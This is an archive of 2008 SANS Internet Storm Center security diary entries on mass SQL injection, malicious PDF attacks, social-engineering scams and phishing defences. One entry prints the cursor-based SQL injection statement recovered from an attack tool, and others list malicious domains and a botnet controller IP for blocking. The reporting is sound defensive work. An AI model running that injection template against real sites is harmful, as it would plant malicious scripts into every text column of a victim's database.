Diaries

0 Comments

Published: 2008-04-25

Hey, where is the podcast?

All the people that listen to the podcast...

Yes we were supposed to do one this week, however, since Johannes was at the SANS conference in Orlando, we decided to bump it a week. So we'll do it next week. (We usually do it Wednesday night, and it's out Thursday morning). I got a couple emails from people asking where Episode 3 was. Just wanted to keep you updated.

Joel Esler

0 Comments

Published: 2008-04-25

One thing to keep in mind about compromised websites

We've all done it. Taken some piece of code that machines are being exploited with and plugged it into Google to see how many machines were infected. You do it, and you say to yourself "OH NOEZ, 10,000 MACHINES! BIG BIG EXPLOIT RAISE THE RED FLAG!"

(Disclaimer: Since Google is a verb in today's language, I don't necessarily mean Google, when I say Google. I mean search engine, but I probably mean Google. )

Things to keep in mind:

1) When you do that, most likely the exploit method is potentially:

a) already known

b) being worked on

c) already been worked on

d) cleaned up

2) There aren't that many machines actually infected/exploited. Google takes awhile to index websites, usually about 2 days behind. It depends on the popularity of your site. I am not going to try and explain how the Google search algorithm/page rank thing works, because number one, I don't know, and number two, if I did, I am sure I could command alot of money from both Google and/or Microsoft for me to work there. But anyway, my point is, Google takes a bit to index sites. Then once the sites are indexed and are then subsequently cleaned up, Google takes a while to clean the entries back out again. (Again, by re-indexing.)

So, at any given point, the index results in Google for "x" exploit are not correct. The numbers at least. The websites you see in Google are either currently exploited, or have been several days/weeks/whatever ago. So keep that in mind.

The next time you read something about "OH NOEZ THE EXPLOIT IS TAKING OVER TEH WORLD. OMG LOL!!11". Try not and panic, it's probably not as big as it's claimed to be.

Joel Esler

1 Comments

Published: 2008-04-24

Hundreds of thousands of SQL injections

Hundreds of thousands of SQL injections UPDATE.
It is recommend that you block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

1.js is the file they are currently injecting. That could change and has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.

The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address 61.188.39.214 and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".

The register covered it stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.

Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html
Websense has good information on it here:
http://securitylabs.websense.com/content/Alerts/3070.aspx

We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/diary.html?storyid=4139
http://isc.sans.org/diary.html?storyid=4294

1 Comments

Published: 2008-04-24

Targeted attacks using malicious PDF files

Dating back to the end of February, we have been tracking test runs of malicious PDF messages to very specific targets. These PDF files exploit the recent vulnerability CVE-2008-0655.

Ever since the end of March, beginning of April, the amount of samples seen in the wild has significantly increased. Interestingly enough, there is almost no "public, widespread" exploitation. All reports are limited to very specific, targeted attacks. However, due to the wide scope of these attacks, and the number of targets we know of, we feel a diary entry was in order.

At this point in time, we are receiving more PDF samples from targeted attack victims per day than any other common file type (DOC, CHM, PPT). The threat agents, or attackers, are the same. They are just moving from other file types towards PDF, but are generally using the same control servers and similar backdoor families.

The files contain:
- an embedded trojan installer;
- a clean PDF file.

Once the file is opened in a vulnerable Acrobat Reader version, the backdoor will install, and the clean PDF file is opened in the user's browser. From a user experience, there are two possible methods of detection:

- If the file is opened in a patched Acrobat Reader, an error will be displayed that the file is corrupted;
- If the file is opened in a vulnerable Acrobat Reader, the user will see Acrobat Reader close and immediately reopen the valid PDF document.

Anti virus detection of these samples is usually very low heuristically. The below are detection results from a malicious PDF which had not been reported to an AV vendor yet. Note that these results vary per file. We're not listing MD5 hashes or file names due to the sheer number of samples we've seen so far.

AhnLab-V3 2008.4.19.0 2008.04.18 -
AntiVir 7.8.0.8 2008.04.18 HTML/Shellcode.Gen
Authentium 4.93.8 2008.04.19 -
Avast 4.8.1169.0 2008.04.19 -
AVG 7.5.0.516 2008.04.19 -
BitDefender 7.2 2008.04.20 Exploit.Shellcode.J
CAT-QuickHeal 9.50 2008.04.19 -
ClamAV 0.92.1 2008.04.20 -
DrWeb 4.44.0.09170 2008.04.19 -
eSafe 7.0.15.0 2008.04.17 -
eTrust-Vet 31.3.5714 2008.04.19 -
Ewido 4.0 2008.04.19 -
F-Prot 4.4.2.54 2008.04.20 -
F-Secure 6.70.13260.0 2008.04.19 -
FileAdvisor 1 2008.04.20 -
Fortinet 3.14.0.0 2008.04.20 -
Ikarus T3.1.1.26.0 2008.04.20 -
Kaspersky 7.0.0.125 2008.04.20 -
McAfee 5277 2008.04.18 -
Microsoft 1.3408 2008.04.20 Exploit:Win32/ShellCode.C
NOD32v2 3041 2008.04.19 -
Norman 5.80.02 2008.04.18 -
Panda 9.0.0.4 2008.04.19 -
Prevx1 V2 2008.04.20 -
Rising 20.40.62.00 2008.04.20 -
Sophos 4.28.0 2008.04.20 Mal/JSShell-B
Sunbelt 3.0.1056.0 2008.04.17 -
Symantec 10 2008.04.20 -
TheHacker 6.2.92.285 2008.04.19 -
VBA32 3.12.6.4 2008.04.16 -
VirusBuster 4.3.26:9 2008.04.19 -
Webwasher-Gateway 6.6.2 2008.04.18 Script.Shellcode.Gen

The embedded dropper is generally specifically written for the occasion:

AhnLab-V3 2008.4.19.0 2008.04.18 -
AntiVir 7.8.0.8 2008.04.18 HEUR/Malware
Authentium 4.93.8 2008.04.19 -
Avast 4.8.1169.0 2008.04.19 -
AVG 7.5.0.516 2008.04.19 -
BitDefender 7.2 2008.04.20 -
CAT-QuickHeal 9.50 2008.04.19 -
ClamAV 0.92.1 2008.04.20 -
DrWeb 4.44.0.09170 2008.04.19 -
eSafe 7.0.15.0 2008.04.17 -
eTrust-Vet 31.3.5714 2008.04.19 -
Ewido 4.0 2008.04.19 -
F-Prot 4.4.2.54 2008.04.20 -
F-Secure 6.70.13260.0 2008.04.19 Trojan-Spy.Win32.Agent.bzq
FileAdvisor 1 2008.04.20 -
Fortinet 3.14.0.0 2008.04.20 -
Ikarus T3.1.1.26 2008.04.20 -
Kaspersky 7.0.0.125 2008.04.20 Trojan-Spy.Win32.Agent.bzq
McAfee 5277 2008.04.18 -
Microsoft 1.3408 2008.04.20 -
NOD32v2 3041 2008.04.19 -
Norman 5.80.02 2008.04.18 W32/Agent.FEOU
Panda 9.0.0.4 2008.04.19 -
Prevx1 V2 2008.04.20 -
Rising 20.40.62.00 2008.04.20 -
Sophos 4.28.0 2008.04.20 -
Sunbelt 3.0.1056.0 2008.04.17 -
Symantec 10 2008.04.20 -
TheHacker 6.2.92.285 2008.04.19 -
VBA32 3.12.6.4 2008.04.16 -
VirusBuster 4.3.26:9 2008.04.19 -
Webwasher-Gateway 6.6.2 2008.04.18 Heuristic.Malware

Acrobat Reader is proving to be an interesting target because users are not very much inclined to upgrade manually. The file format is relatively stable and users of Acrobat Reader 7 may not always feel a need to upgrade.

As such, we strongly recommend that you:

- Ensure your Acrobat Reader installations have been upgraded to version 8.1.2;
- Disable Javascript parsing through Edit>Preferences>Javascript, by disabling the 'Enable Acrobat JavaScript' option.

Naturally we greatly appreciate any additional information you can provide on attacks you feel may be related to this exploit. Additional amples especially are always welcome.

Cheers,
Maarten

0 Comments

Published: 2008-04-23

What's New, Old and Morphing?

Cyberspace was so busy churning out facts yesterday that our Handler on Duty, Donald Smith furiously posted diary entries to keep you informed. So, I thought I would take a moment to summarize the events of April 22 and further elaborate on the situation.

First, spam plagues us every day so it is important for us to stay up on the current threat vector. Don wrote about the latest attempt to exploit users called “Apocalyptic NEWS Usama Ben Laden.” The email attempts to lure users to download a version of Zlob. The links in the blog site are malicious.
Don talked about another spam phenomenon involving Google agenda. This is considered a new method of delivery.
Social network site MySpace was exploited again in an attempt to lure the user to download by clicking on a “fake” Microsoft update popup. The pop up is actually a large css layer which initiates a download session.
Then, Don told us about a situation in which a malicious .rar file (promising Paris Hilton undressing), which cleverly bypassed email gateway security but was ultimately found by an AV program. The program seems to be SDBOT.

So there you have it, new spam, Google agenda, social networking css and a bot. Another day in the life… But, all that was all so yesterday, today we have several situations arousing attention from our readers.

First off today, Heather wrote in to tell us about US Cert releasing an advisory yesterday afternoon concerning a malicious website injecting javascript which infected many UK and a UN site. Websense alerted about it here. They analyzed the malware and concluded that it is related to our story by Bojan. We recommended mitigations for the situation here.

Then, Andrew from Vancouver wrote in to tell us about his experience with a Wordpress Blog infection that let spammers insert hidden text into the Wordpress (several versions) powered sites. While not widespread, the technique is interesting and should allow us the opportunity to discuss these methods of attack. Further information is revealed on a Tech Side Up blog.

Another reader sent in an old “download this” scam which has seemed to have migrated itself to a Skype chat. The following information is used to get the user to click on the included link which downloads the Downloader Trojan. Your AV should catch the download of this old nasty, but the new delivery vector should be added to the warnings to users through your security awareness programs.

"[4:09:40 PM] Software Update ® says: WINDOWS REQUIRES IMMEDIATE ATTENTION
=============================
ATTENTION ! Security Center has detected
malware on your computer !

Affected Software:
Microsoft Windows NT Workstation
Microsoft Windows NT Server 4.0
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Win98
Microsoft Windows Server 2003

Impact of Vulnerability: Remote Code Execution / Virus Infection /
Unexpected shutdowns

Recommendation: Users running vulnerable version should install a repair
utility immediately

Your system IS affected, download the patch from the address below !

Failure to do so may result in severe computer malfunction."

That sums it up! With all this activity, let us know what you are seeing out there.

Fair winds,

Mari

0 Comments

Maximus root kit downloads via MySpace social engineering trick.

A reader, GreggS, provided a link to a myspace page with a specific friendid that has java script that popsup a transparent background gif on top of the normal user page. The transparent background gif appears to be a Automatic Update of the Microsoft Malicious Software Removal Tool. This is likely to fool a fair amount of people.

“Clicking anywhere on the page (on large css layer on top) and your
browser initiates a download session from an ftp at
microsofpsupports.cn and you are asked to download and/or run (no!)
the file.
The "Automatic Update" (not "Windows Update") dialog is simply a gif image.
http://img404.imageshared.cn/img/20048/removaltool6gx87.gif “
This appears to be a new version of Maximus

Virustotal results here:
http://www.virustotal.com/analisis/3a29d07603a0430a74e8aa77bc81e6bb

0 Comments

Symantec decomposer rar bypass allowed malicious content.

ScottT of Blue Cross Blue Shield submitted the following information and a
rar file that bypassed his Symantec decomposer on his SMTP gateway.

“We received over 30 of these emails containing infected rar files.
Symantec detected them, but somehow these emails evaded our email
gateway and spam filter. The body text contained blocked words so it should
have been dumped by the spam filter. Our email gateway strips rar and scr
attachments, so the attachments should have been stripped.

We sent test emails with the offensive body text and the spam filter dumped
them. We also sent test emails with rar files attached, and the emails
arrived with the attachment stripped.

This has us stumped. It seems our systems are functioning properly, but
these emails are beating them.”

This was in the message headers of the email he forwarded to us.
“This message has been processed by Symantec AntiVirus.
screen.scr is still infected with the malicious virus Downloader because the
Symantec decomposer cannot modify its container.“

The text of the message implies you will see Paris Hilton undress if you open the attachment.

VirusTotal recognized screen.rar as a trojan downloader.
http://www.virustotal.com/analisis/67258db1006d464e1d5ff4248db306dd

Sending screen.scr to cwsandbox.org produced a good analysis.
Short version is it is a version of SDBOT.
Nitty-Gritty details available here:
https://cwsandbox.org/?page=details&id=215016&password=ftkxv

Symantec has suggested some changes to Scott's SMTP gateway configuration that may prevent further bypasses. The version of zip I have under cygwin also reported this rar as "damaged or invalid".

0 Comments

Spam to your calendar via Google agenda?

Every once in a while I see a new spamming method.
This one came from google agenda and came in as a meeting invite.
I deleted the email but due to my preferences in exchange it appeared in my calendar anyways.

So I only have to send them $150 non-resident tax to get $1.2 M.
What a deal:) I think I will pass.

I have never had to analysis an ics (calendar file) before so I saved it.
Next I used a text processor to pull elements of the header.
Here is what the header looks like. I removed the email addresses:)

"BEGIN:VCALENDAR
PRODID:-//Google Inc//Google Calendar 70.9054//EN
VERSION:2.0
CALSCALE:GREGORIAN
METHOD:REQUEST
BEGIN:VEVENT
DTSTART:20080406T063000Z
DTEND:20080406T073000Z
DTSTAMP:20080405T191500Z
ORGANIZER;CN=Senders Name:MAILTO:sendersaddress@gmail.com
UID:0scrnh2u3gtf72q776ojru7ioc@gmail.com
ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP=
TRUE;CN=victimsname;X-NUM-GUESTS=0:MAILTO:victimsname@Ymail.com
CLASS:PRIVATE
CREATED:20080405T191359Z

Actual content viewable via outlook calendar.
"Google Agenda
donald smith, vous êtes invité(e) à participer à
Your pending transfers respond prompt.
sam. 5 avr. 20:30 – 21:30
(Fuseau horaire : Hawaï)
Agenda : donald smith
Compliments and Greetings,
This is an official notification of the availability of your full
entitlement valid 1.2 million which has not been affected due to official
negligence. This transfer has been held pending and its original account
suspended pending when the benefactor provided the TAX clearance
document .but the impostors who are operating in syndicates all over the
world today are misled and misguided you about the position of your fund
with the sole aim of exporting money from you that explain why you have
not receive the payment up-to-date.

However, you are advised to immediately reconfirm your telephone and
currant contact/ payment receiving details to this e-mail address (
richtransferoffice@yahoo.co.in) .You will receive your payment by: (1)
By wire transfer direct to your nominated bank account. (2). Issuing
you ATM CARD 3) or by drawing a cashiers cheque payable in your name,
with strict procedures of the International funds transfer rules and
regulations in avoidance of unhealthy intents and unnecessary delay.

So, let us know which of option you like to receive your monies .But
before we proceed, you are required to make a payment of the Non-resident
tax of $150 only as the authorities demand which is described as
selective payment to enable us effect maximum clearance on
your file and automate your full information on the transfer script
text to ensure that the payment reach your hand on time through a legal
secure way from the exact time frame we initiate our service if you
accurately furnished us with our requirement as instructed.

Note that we have no legal right to deduct or add to the value of your
funds because your payment has already been keyed into the system for
final transfer, thus the compliance with this condition this payment
will reach you within 48 banking hour or less.

Yours faithfully,
Johnson Mark
International Clearing House West Africa- BENIN
Affiliate to the World Association of Debt Management.
Plus d’infos sur l'événement»

Participerez-vous ?
Oui |Non |Peut-être
http://www.google.com/calendar/images/envelope.gif

Vous recevez ce message à l'adresse victim'sname@Ymail.com, car vous participez à cet événement.

Pour ne plus recevoir de notifications pour cet événement à l'avenir, refusez cet événement. Vous avez également la possibilité de créer un compte Google Agenda sur la page http://www.google.com/calendar/ et de définir vous-même les paramètres de notification pour l'intégralité de votre agenda.
<<invite.ics>>"

0 Comments

“Apocalyptic NEWS Usama Ben Laden”

James notified us that “Apocalyptic NEWS Usama Ben Laden” is being
SPAMMED out with malicious links in it. This is an attempt to get people to
load a version of Zlob. The links at the following blog site are malicious.
DO NOT VISIT THEM. Here is the VirusTotal report on the malware I
found there http://www.virustotal.com/analisis/a914b92b454eff25407a61fa52af9d67 .
This site collects spams and many of the links there will be dangerous.
From:
http://spamrecorder.blogspot.com/2008/04/special-issue-of-news-from-
bloomberg.html
SPAM Recorder
“This blog is started as a web experiment to record spam emails. This
web experiment, SPAM Recoder , auto-records mail spams resulting
from an email-id, left un-masked to a few social book-marking sites.”

0 Comments

XP SP3 RC2 Available

“Microsoft Windows XP Service Pack 3 is a rollup that includes all previously released updates for Windows XP, including security updates, out-of-band releases, and hotfixes. It contains a small number of new updates, but should not significantly change the Windows XP experience.”

http://technet.microsoft.com/en-us/windowsxp/0a5b9b10-17e3-40d9-8d3c-0077c953a761.aspx
Thanks Robert.

0 Comments

Published: 2008-04-20

Software Update -- Did Apple Do Enough?

I've been reading alot of articles recently about Apple's Software Updates. A couple of weeks ago, we talked about this in the ISC podcast, about Safari being automatically checked for installation if you have Apple Software Update installed. Apple Software Update is Apple Inc.'s piece of software that keeps Quicktime, iTunes, and Safari updated on your Windows Machine. It obviously does a lot more on our Apple's.

Now, I am an Apple user, an AVID Apple user. I own no less then 15-20 of their products, and an avid Apple defender. But even I said that Safari being automatically checked and enabled for download and installation on Windows machines was going a step too far. I don't mind if it was there for download, but automatically checked? Meh.

Now, I don't have a Windows machine, so I haven't been able to experience this myself, but apparently Apple issued an update to Software Update last week that moved Safari down to a block called "Optional Downloads", instead of being labeled as an update. Well, it's a great step, but I still am of the opinion that Apple didn't go far enough. Safari is still checked by default!?

What's the big deal? It's just an update, or even an optional download. Well, that's fine except that Safari was checked even on machines that didn't have Safari installed on it. Apple wasn't the forcing the download on people, but it sure wasn't making it obvious that it was an optional download.

So my question is, did Apple go far enough? I don't think they did, I would like to see it unchecked by default as an optional download. I don't mind if Apple offers the Windows users a better browsing experience. ;) But I do mind if they make the browser seem like it's a part of an already existing installation.

The problem wouldn't be so bad, but I know at some point in the near future someone, whether it's Apple or some other agency , will report that Safari as "x" amount of market share, which me, as an Apple guy will say "Yeah! We have "X"!". But will it really be a real metric?

Joel Esler

http://www.owasp.org/index.php/Top_10_2007-A2#Protection

5 Comments

Published: 2008-04-18

The Patch Window is Gone: Automated Patch-Based Exploit Generation

For some time, many researchers have been pointing to the fact that the "patch window" (the time between a patch being released and an exploit being developed) has been decreasing. A few years ago, the ISC's Johannes Ullrich did a presentation on this subject which showed the patch window decreasing to a few days. Today, another Handler, Mari Nichols, pointed me to this research from a joint project between Berkeley, University of Pittsburgh and Carnegie Mellon.

For some time, it has been known that the patch can be reverse-engineer to help attackers write an exploit for a vulnerability that might not be fully detailed in public accounts (for good reason). The bad guys have gotten pretty good at this where they can turn around an exploit in a day or so after a patch is released. What is interesting about this research is that they developed means partly using off-the-shelf tools to make this process automatic.

In some of the cases they tried, they claimed to be able to create an exploit in minutes after receiving the patch and comparing the patched version of the application with the unpatched version. To be fair, their process seemed "dirty" such that more often than not the exploit created crashes or DoS type exploits and several attempts were needed to get something closer to viable. The process often took minutes so when/if the method is improved it could be trivial to create something that grabbed patches ASAP, turn an exploit in minutes and start infected vulnerable machines before 3am during the monthly patch dump with automated patching.

A solution suggested by the authors is "secure distribution of patches". To me, this is meaningless. You need to get patches out to people with a minimum amount of effort. This is why automated patching was such a good thing. But even if you encrypt, require passwords and logins, etc... you are going to delay the time for legitimate people to patch, and attackers (who are perfectly able to buy Windows legit) will grab the patches quickly anyway. You'd only make the window of vulnerability longer by making things secure without a tangible benefit.

Solution: Not much, we've known the window was closing for awhile. Responding quickly and proactively to threats is still a must and the use of temporary workarounds will probably raise in value. Thoughts? Send them my way.

--
John Bambenek / bambenek {at} gmail [dot] com

1 Comments

Published: 2008-04-18

EV SSL Certificates - Just once, why can't one of our poorly considered quick fixes work?

PayPal has announced some of its strategies against phishing against their users. Some of this is good stuff and since PayPal is a larger target, they should be commended in taking a proactive role. However, the requirement that browsers using PayPal must support EV SSL Certs and that they must have built-in anti-phishing protection simply do no good. First, an analysis on EV SSL certificates:

EV SSL Certificates - Twice the Effort, 10 times the Cost, No tangible benefit

Extended Validation Certificates are basically SSL certs that require a more detailed background examination of the requesting entity. They require an establishment of a legal identity, that the applicant owns the domain and that all the required documents are signed by an authorized official. In short, it requires the sort of thing that any SSL certificate should have required in the first place. If you think about it, a general SSL certificate should "prove" that you are seeing an authentic website. The reality is, that pretty much anyone can get an SSL cert (for free) without proving anything. The only validation is that the FQDN in the cert matches what the browser says. Net result, attackers buy domains and then gets certs for them, because no real validation occurs. www-paypal.com can get an SSL certificate too that will show up as valid to a user. All an SSL certificate proves is that the URL matches the certificate.

Now comes EV Certs which are supposed to provide that background check that should have taken place before issuing a normal SSL certificate to begin with. Generally, they require the requesting entity to be: a government entity, a legal corporation, a general partnership, a sole proprietorship, or an unincorporated association. This level of "authentication" only makes criminals simply jump through some more hoops... hoops they may have jumped through already (more on that later).

Here is how you can become a legal corporation in less than 24 hours (this is US-Centric, sorry I don't know how to form companies in another nation, but foreign entities can apply for FEINs by fax here). Step one, go to the IRS and apply for a FEIN. You can pretty much enter any values you want here, they just have to pass the smell-test. For instance, create a FEIN for "Al Qaeda in America". (NB, realize you're probably never going to be able to get on a plane in the US again without a thorough prostate exam). You get your FEIN back instantly.

Step two, let's say you want to incorporate in Illinois. Go here to the Secretary of State's website, fill out the form, and you get your articles of incorporation in 24 hours. Congratulations, you are now incorporated and eligible for an EV Cert.

These steps may not be necessary because many spam outfits and other nefarious groups are already incorporated. In short, this process doesn't keep the Internet's bottom-feeders out, it just makes them jump through a few more hoops and toss some cash towards the Certificate Authorities. For that matter, many outright mob outfits are properly organized in the legal sense.

While it is important to note that the list of CAs that can issue EV Certs is smaller than the general list of CAs, I have little faith this will remain so. Many CAs came to be simply to lower the bar to getting a certificate, there will be the same demand to lower the bar to get EV Certs and companies that are willing to service the less-than-honest among us. The bar was lowered once, it'll be lowered again.

So an EV certificate only proves that the website owner can fill out a few webforms, cough up some money, and cough up some more money to pay the CAs for doing the job they should have done in the first place (i.e. verify the identity of the requestor of a cert).

All this said, it doesn't protect against website content that is made to look like another website (i.e. forgery). A user may not see the full green bar, but the content can be made to look and feel the same. Even worse, a normal SSL certificate can still work and display content that is malicious. Or for that matter, a website that isn't encrypted at all. The question remains, is a user able to discern an EV Signed site from other SSL signed sites to know the difference. Academic research indicates that, no, EV certificates make no impact on users spotting fraudulent sites or not.

The purpose of EV SSL Certs - PayPal isn't Using them Correctly

The purpose of an EV SSL certificate is to authenticate a website to a user, period. PayPal, however, is wanting to use EV SSL support as a way of authenticated a user to PayPal. That makes no sense. PayPal has an interest in authenticating people who want to use their service are valid. The presence or absence of EV SSL support in their browser is irrelevant. Does anyone really think that say, the Russian Mob, won't be able to use IE to process PayPal transactions with stolen credentials?

This stance won't, for instance, prevent users from getting keyloggers on their machines to steal the information, being infected with a trojan that will silently process transactions while the user is logged-in, money mules from doing the heavy lifting for malicious individuals, cross-site scripting, or from a user giving up their credentials in a phishing attack to another website. In short, an EV SSL enabled browser proves nothing.

How to Properly Authenticate a User for Online Transactions With Proven Technology

There are already existing and proven ways to authenticate a user for online transactions in a way that mitigates the phishing problem. Many banks do this already as well. Two-factor authentication limits the ability to use stolen information for online fraud (though it does not prevent the trojan problem mentioned above, but neither does EV SSL or "anti-phishing" browsers). Requiring a hardware token to enter another piece of data to send money is something that is shown to work and is economical considering the cost for fraud.

Part of the phishing problem with paypal is the amount of emails they send to their customers and the difficulty of users in determining authenticity. Signed e-mail would help. Reducing e-mail or at least sending email with no clickable links would be better. Both would be great.

Anti-phishing support in a browser proves nothing, there are plenty of fine solutions out there that provide anti-phishing protection. Simply attacking Safari smacks of Anti-Apple bias. And while I'm not fan of the ham-handed way they do security, Mac users simply aren't the phishing victims we need to worry about right now.

Remote Validation of Secure Systems

I have argued that the fundamental problem with phishing, and in fact, all online fraud is the fundamental assumption that consumer PCs can be secured and/or are trustworthy. We need to accommodate ourselves to this fact: consumer PCs are insecure and insecurable. We must treat them as such, just like we treat communication over the internet as insecure and susceptible to interception. This goes back to the absolute necessity of two-factor authentication for "important" transactions and the elimination of typing in sensitive data into a web browser. For instance, the U.S. Department of Education still uses the **Social Security Number** as a **username** to log in to their student loan system. Keyloggers everywhere are happily stealing college students' SSNs and stealing their identities as we speak.

There is a place for remote validation for consumer PCs and denying them access if they are insecure (and I've argued as such). However, simply validating default broswer features is not it. It would be far better to ensure up-to-date AV signatures, up-to-date patches, up-to-date spyware/malware protection and secure OS configuration. Failing any of these, the site in question can provide instructions (or better yet, send the user a CD) to secure and harden their machine.

Basing your security posture based on superficial differentiators provides no real security, and really only creates a headache. This takes work, laziness will only get more people 0wned.

--
John Bambenek /at/ gmail {dot} com

0 Comments

Published: 2008-04-18

IIS Vulnerability Documented by Microsoft - Includes Workarounds

Microsoft has just put out an advisory for a privilege escalation vulnerability in Windows that affects IIS and potential SQL server (951306). Basically, authenticated users can use this vulnerability to become LocalSystem. This is probably more of a problem for shared hosting environments were clients could upload malicious code to the webserver and run the exploit to gain additional rights. SQL is less of a problem because permissions have to be explicitly given to allow a SQL user to run code.

The advisory contains workarounds for IIS 6 and 7 that is claimed to blunt this vulnerability. The only negative impact of those workarounds is to add some extra work when adding users but does block the vector of attack.

There is a public report of this, but apparently no exploits yet. More when we get additional information, but refer to MSFT's advisory with details on how to workaround.

Update

Cesar's paper has been released and you can see it here

--
John Bambenek / bambenek {at} gmail [dot] com
Neither ran, nor sleet, nor earthquakes shaking my office will stop the ISC

0 Comments

Published: 2008-04-17

Safari 3.1.1 Released

Apple released Safari 3.1.1 which can be downloaded from here

This update includes security fixes for four vulnerabilities and is described in more detail here

0 Comments

Published: 2008-04-17

Firefox Update

Firefox 2.0.0.14 has been released and can be downloaded from here.

Thanks to all who wrote in to tell us.

0 Comments

Published: 2008-04-16

Passer, a aassive machine and service sniffer

Last summer I did a short post on detecting servers using tcpdump or windump, syn/ack packets, and a few command line tools. It was.... well, pretty rudimentary. *smile*

https://isc.sans.org/diary.html?storyid=3018

This spring I decided to put together a passive service sniffer - "Passer". It can report on live tcp and udp servers and clients, ethernet cards and manufacturers, dns records, operating systems, and routers. If you have nmap installed, it will use nmap's service fingerprint file to get a really good guess at exactly what service is running on a port.

The output is comma separated for easy import into a database, a spreadsheet, or command line tools.

Because it's written in python, it should be portable to almost any operating system. Because of my odd Windows XP set up I hit a snag with the underlying packet capture library (scapy) on windows, but it should work on almost anything with python.

Home site: http://www.stearns.org/passer/

Instructions: http://www.stearns.org/passer/passer.txt

Sample output: http://www.stearns.org/passer/passer.txt

-- Bill Stearns

0 Comments

Published: 2008-04-16

Windows XP Service Pack 3 - unofficial schedule: Apr 21-28

Information Week and Neowin.net are reporting that Windows XP Service
Pack 3 may be showing up at the end of this month. OEMs and
MSDN/Technet subscribers will apparently have access on the 21st, with
release to Windows Update on the 29th.

http://www.nytimes.com/2008/04/16/technology/16whale.html?em&ex=1208491200&en=e9a041f3c68cefc3&ei=5087%0A

This is an unofficial report - we do not have confirmation from
Microsoft for this.

0 Comments

Published: 2008-04-16

The 10.000 web sites infection mystery solved

Back in January there were multiple reports about a large number of web sites being compromised and serving malware. Fellow handler Mary wrote the initial diary at http://isc.sans.org/diary.html?storyid=3834.

Later we did several diaries where we analyzed the attacks, such as the one I wrote at http://isc.sans.org/diary.html?storyid=3823. Most of the reports about these attacks we received pointed to exploitation of SQL Injection vulnerabilities.

Yesterday, one of our old friends, Dr. Neal Krawetz, pointed us to another site hosting malicious JavaScript files with various exploits. While those exploits where more or less standard, we managed to uncover a rare gem between them – the actual executable that is used by the bad guys in order to compromised web sites.

While even before we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used. The strategy was relatively simple: they used search engines in order to find potentially vulnerable applications and then tried to exploit them. The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site.

The utility we recovered does the same thing. The interface appears to be is in Chinese so it is a bit difficult to navigate around the utility, but we did some initial analysis of the code (which is very big) to confirm what it does. You can see the interface below:

InsertHTML screenshot

So what the tool does is this:

The user can configure the tag that will be inserted on the compromised web sites. By default, the tool we recovered had the following string embedded: http://www.2117966 [dot] net/fuckjp.js. Sounds familiar? See https://isc.sans.org/diary.html?storyid=4139
The tool then checks something with a site in China. My guess at this point in time is that the attackers get paid for this since the tool calls a script pay.asp with an argument SN to verify something.
Now the user can start the tool. It will connect to Google and will search for vulnerable sites with the following query string: inurl:".asp" inurl:"a=". The parameter is configurable and the tool can search for many strings. For crawling, the tool uses a built-in embedded browser from bsalsa (http://www.bsalsa.com)
Once the URLs have been identified, the tool tries to attack the web sites with SQL Injection (I still have to analyze this part further to see how it works). The SQL injection string, though, is visible in the file and formatted with the tag defined in the first. Here is how the SQL Injection statement gets formulated

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' a
nd (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('up
date ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''
''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);--

The nice thing about this is that we finally managed to confirm that it is SQL Injection that was used in those attacks. The tool has more functionality that we still have to analyze but this is the main purpose.

So, to finish this diary – a call to all web site owners – check your applications and make sure that they are not vulnerable. We covered this many times in various diaries, so here are few links to online resources that can help with this:

http://weblogs.asp.net/scottgu/archive/2006/09/30/Tip_2F00_Trick_3A00_-Guard-Against-SQL-Injection-Attacks.aspx

http://portal.spidynamics.com/blogs/msutton/archive/2006/09/26/How-Prevalent-Are-SQL-Injection-Vulnerabilities_3F00_.aspx

http://erratasec.blogspot.com/2007/08/sql-injection-is-surpisingly-easy.html

Bojan

0 Comments

Published: 2008-04-15

It's Tax Day

If you have to file US income taxes, today is your last day to do so for the 2007 tax year. Of course, as expected, there are plenty of scams people wrote in today about. Most of these involve fake IRS emails, and they either promise a refund (which then leads to a phishing site), or they arrive with an attachment which of course turns out to be malware. In a new twist, some of these scams evolve around the economic stimulus package passed earlier this year, which leads to special refunds for many US tax filers. Since there isn't much new here (but enough of it to warrant this quick note), please use this to re-enforce basic safe computing practices. Minimize the use of attachments. Avoid handing out confidential information over e-mail or based on a request sent to you via e-mail. If in doubt: call (but be careful with inbound calls as well. If in doubt, call back a listed number, not the number provided by the caller or caller ID). Finally: If you are heading for SANS 2008 in Orlando next week, stop by. I should be around all week. ----- Johannes B. Ullrich, Ph.D. Chief Research Officer, SANS

0 Comments

Published: 2008-04-15

SRI Malware Threat Center

